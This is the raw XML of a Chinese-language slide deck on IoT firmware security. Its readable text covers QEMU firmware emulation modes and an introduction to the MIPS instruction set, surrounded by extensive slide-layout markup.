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4"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="307" r:id="rId4"/>
    <p:sldId id="265" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="305" r:id="rId7"/>
    <p:sldId id="508" r:id="rId8"/>
    <p:sldId id="281" r:id="rId9"/>
    <p:sldId id="280" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="454" r:id="rId12"/>
    <p:sldId id="361" r:id="rId13"/>
    <p:sldId id="282" r:id="rId14"/>
    <p:sldId id="336" r:id="rId15"/>
    <p:sldId id="379" r:id="rId16"/>
    <p:sldId id="380" r:id="rId17"/>
    <p:sldId id="381" r:id="rId18"/>
    <p:sldId id="298" r:id="rId19"/>
    <p:sldId id="360" r:id="rId20"/>
    <p:sldId id="299" r:id="rId21"/>
    <p:sldId id="338" r:id="rId22"/>
    <p:sldId id="363" r:id="rId23"/>
    <p:sldId id="364" r:id="rId24"/>
    <p:sldId id="420" r:id="rId25"/>
    <p:sldId id="339" r:id="rId26"/>
    <p:sldId id="365" r:id="rId27"/>
    <p:sldId id="367" r:id="rId28"/>
    <p:sldId id="455" r:id="rId29"/>
    <p:sldId id="366" r:id="rId30"/>
    <p:sldId id="268" r:id="rId31"/>
    <p:sldId id="368" r:id="rId32"/>
    <p:sldId id="269" r:id="rId33"/>
    <p:sldId id="421" r:id="rId34"/>
    <p:sldId id="301" r:id="rId35"/>
    <p:sldId id="302" r:id="rId36"/>
    <p:sldId id="378" r:id="rId37"/>
    <p:sldId id="566" r:id="rId38"/>
    <p:sldId id="567" r:id="rId39"/>
    <p:sldId id="369" r:id="rId40"/>
    <p:sldId id="303" r:id="rId41"/>
    <p:sldId id="370" r:id="rId42"/>
    <p:sldId id="457" r:id="rId43"/>
    <p:sldId id="456" r:id="rId44"/>
    <p:sldId id="458" r:id="rId45"/>
    <p:sldId id="506" r:id="rId46"/>
    <p:sldId id="371" r:id="rId47"/>
    <p:sldId id="507" r:id="rId48"/>
    <p:sldId id="376" r:id="rId49"/>
    <p:sldId id="373" r:id="rId50"/>
    <p:sldId id="374" r:id="rId51"/>
    <p:sldId id="375" r:id="rId52"/>
    <p:sldId id="372" r:id="rId53"/>
    <p:sldId id="377" r:id="rId54"/>
    <p:sldId id="505" r:id="rId55"/>
    <p:sldId id="557" r:id="rId56"/>
    <p:sldId id="558" r:id="rId57"/>
    <p:sldId id="565" r:id="rId58"/>
    <p:sldId id="559" r:id="rId59"/>
    <p:sldId id="561" r:id="rId60"/>
    <p:sldId id="562" r:id="rId61"/>
    <p:sldId id="273" r:id="rId62"/>
    <p:sldId id="263" r:id="rId63"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="514794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10" d="100"/>
          <a:sy n="110" d="100"/>
        </p:scale>
        <p:origin x="77"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notesMaster" Target="notesMasters/notesMaster1.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8198" y="1143000"/>
            <a:ext cx="5481604"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71434"/>
            <a:ext cx="2057400" cy="274083"/>
          </a:xfrm>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a:xfrm>
            <a:off x="3028950" y="4771434"/>
            <a:ext cx="3086100" cy="274083"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457950" y="4771434"/>
            <a:ext cx="2057400" cy="274083"/>
          </a:xfrm>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628650" y="1642018"/>
            <a:ext cx="7886700" cy="1863966"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4505" b="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑标题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083"/>
            <a:ext cx="7886700" cy="995042"/>
          </a:xfrm>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417"/>
            <a:ext cx="3886200" cy="326635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370417"/>
            <a:ext cx="3886200" cy="326635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a:xfrm>
            <a:off x="3028950" y="4771434"/>
            <a:ext cx="3086100" cy="274083"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6"/>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4083"/>
            <a:ext cx="7886700" cy="995042"/>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629841" y="1309866"/>
            <a:ext cx="3868340"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1963423"/>
            <a:ext cx="3868340" cy="268288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9866"/>
            <a:ext cx="3887391"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3423"/>
            <a:ext cx="3887391" cy="268288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a:xfrm>
            <a:off x="3028950" y="4771434"/>
            <a:ext cx="3086100" cy="274083"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="灯片编号占位符 8"/>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20667"/>
            <a:ext cx="4286250" cy="1037745"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="6005"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a:xfrm>
            <a:off x="628650" y="4771434"/>
            <a:ext cx="2057400" cy="274083"/>
          </a:xfrm>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a:xfrm>
            <a:off x="3028950" y="4771434"/>
            <a:ext cx="3086100" cy="274083"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457950" y="4771434"/>
            <a:ext cx="2057400" cy="274083"/>
          </a:xfrm>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2428875" y="2802350"/>
            <a:ext cx="4286250" cy="890231"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="24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a:xfrm>
            <a:off x="3028950" y="4771434"/>
            <a:ext cx="3086100" cy="274083"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>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723"/>
            <a:ext cx="3511241" cy="1072058"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="27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4231888" y="535723"/>
            <a:ext cx="4283912" cy="4056246"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="342900" indent="0">
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="686435" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1029335" indent="0">
              <a:buNone/>
              <a:defRPr sz="1500"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1372870" indent="0">
              <a:buNone/>
              <a:defRPr sz="1500"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1715770" indent="0">
              <a:buNone/>
              <a:defRPr sz="1500"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2059305" indent="0">
              <a:buNone/>
              <a:defRPr sz="1500"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2402205" indent="0">
              <a:buNone/>
              <a:defRPr sz="1500"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2745740" indent="0">
              <a:buNone/>
              <a:defRPr sz="1500"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1736923"/>
            <a:ext cx="3511241" cy="2861192"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1350"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="342900" indent="0">
              <a:buNone/>
              <a:defRPr sz="1050"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="686435" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1029335" indent="0">
              <a:buNone/>
              <a:defRPr sz="750"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1372870" indent="0">
              <a:buNone/>
              <a:defRPr sz="750"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1715770" indent="0">
              <a:buNone/>
              <a:defRPr sz="750"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2059305" indent="0">
              <a:buNone/>
              <a:defRPr sz="750"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2402205" indent="0">
              <a:buNone/>
              <a:defRPr sz="750"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="274574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628650" y="4771434"/>
            <a:ext cx="2057400" cy="274083"/>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a:xfrm>
            <a:off x="3028950" y="4771434"/>
            <a:ext cx="3086100" cy="274083"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457950" y="4771434"/>
            <a:ext cx="2057400" cy="274083"/>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4083"/>
            <a:ext cx="681676" cy="4362692"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3305"/>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628649" y="274083"/>
            <a:ext cx="7084832" cy="4362692"/>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3028950" y="4771434"/>
            <a:ext cx="3086100" cy="274083"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>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3028950" y="4771434"/>
            <a:ext cx="3086100" cy="274083"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>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4019"/>
            <a:ext cx="7886700" cy="417287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6435" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3305" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="171450" indent="-171450" algn="l" defTabSz="686435" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="750"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="514985" indent="-171450" algn="l" defTabSz="686435"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2pPr>
      <a:lvl3pPr marL="85788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3pPr>
      <a:lvl4pPr marL="120142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432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785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3075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429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719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6435" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1350" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="342900" algn="l" defTabSz="686435" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1350" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="686435" algn="l" defTabSz="686435" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1350" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1029335" algn="l" defTabSz="686435" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1350" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1372870" algn="l" defTabSz="686435" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1350" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="1715770" algn="l" defTabSz="686435" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1350" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2059305" algn="l" defTabSz="686435" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1350" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="2402205" algn="l" defTabSz="686435" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1350" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="2745740" algn="l" defTabSz="6864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github.com/paulusmack/ppp/commit/8d7970b8f3db727fe798b65f3377fe6787575426" TargetMode="Externa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image" Target="../media/image77.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.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15.png"/><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9.png"/><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1.png"/><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3.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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5.png"/><Relationship Id="rId1"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mp.weixin.qq.com/s/TqC_d8RlhXHxJehfiq1u1g&#1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8.png"/><Relationship Id="rId1"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0.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
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1905"/>
            <a:ext cx="9144000" cy="5151120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10" descr="PPT"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="737870" y="4595495"/>
            <a:ext cx="1505585" cy="113030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737870" y="1494155"/>
            <a:ext cx="4215130" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>设备安全之固件安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737870" y="3663950"/>
            <a:ext cx="1681480" cy="229870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2020.08/H4lo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs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74" y="397924"/>
            <a:ext cx="1283211" cy="499873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="PPT调整"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492625" y="-1270"/>
            <a:ext cx="4651375" cy="5151120"/>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固件模拟概述</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>qemu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行固件模拟主要可以分为两类：用户模式和系统模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="图片1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="98425" y="2313305"/>
            <a:ext cx="1908175" cy="1820545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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QEMU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>固件模拟</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="F8F8F8">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="F8F8F8">
                  <a:alpha val="100000"/>
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="98425" y="4084955"/>
            <a:ext cx="6018530" cy="777240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3876675" y="1997075"/>
            <a:ext cx="668655" cy="2813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stCxn id="3" idx="2"/>
            <a:endCxn id="2" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3107690" y="2278380"/>
            <a:ext cx="1103630" cy="18065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4441190" y="2478405"/>
            <a:ext cx="4665345" cy="1606550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4650740" y="1988185"/>
            <a:ext cx="713105" cy="3079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a:stCxn id="8" idx="3"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5363845" y="2142490"/>
            <a:ext cx="1410335" cy="3359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040" y="4126865"/>
            <a:ext cx="5930900" cy="68643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sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MIPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指令集介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1945005"/>
            <a:ext cx="7108825" cy="1522095"/>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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>特点：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指令都以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>字节对齐</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>寄存器较多（</a:t>
            </a:r>
            <a:r>
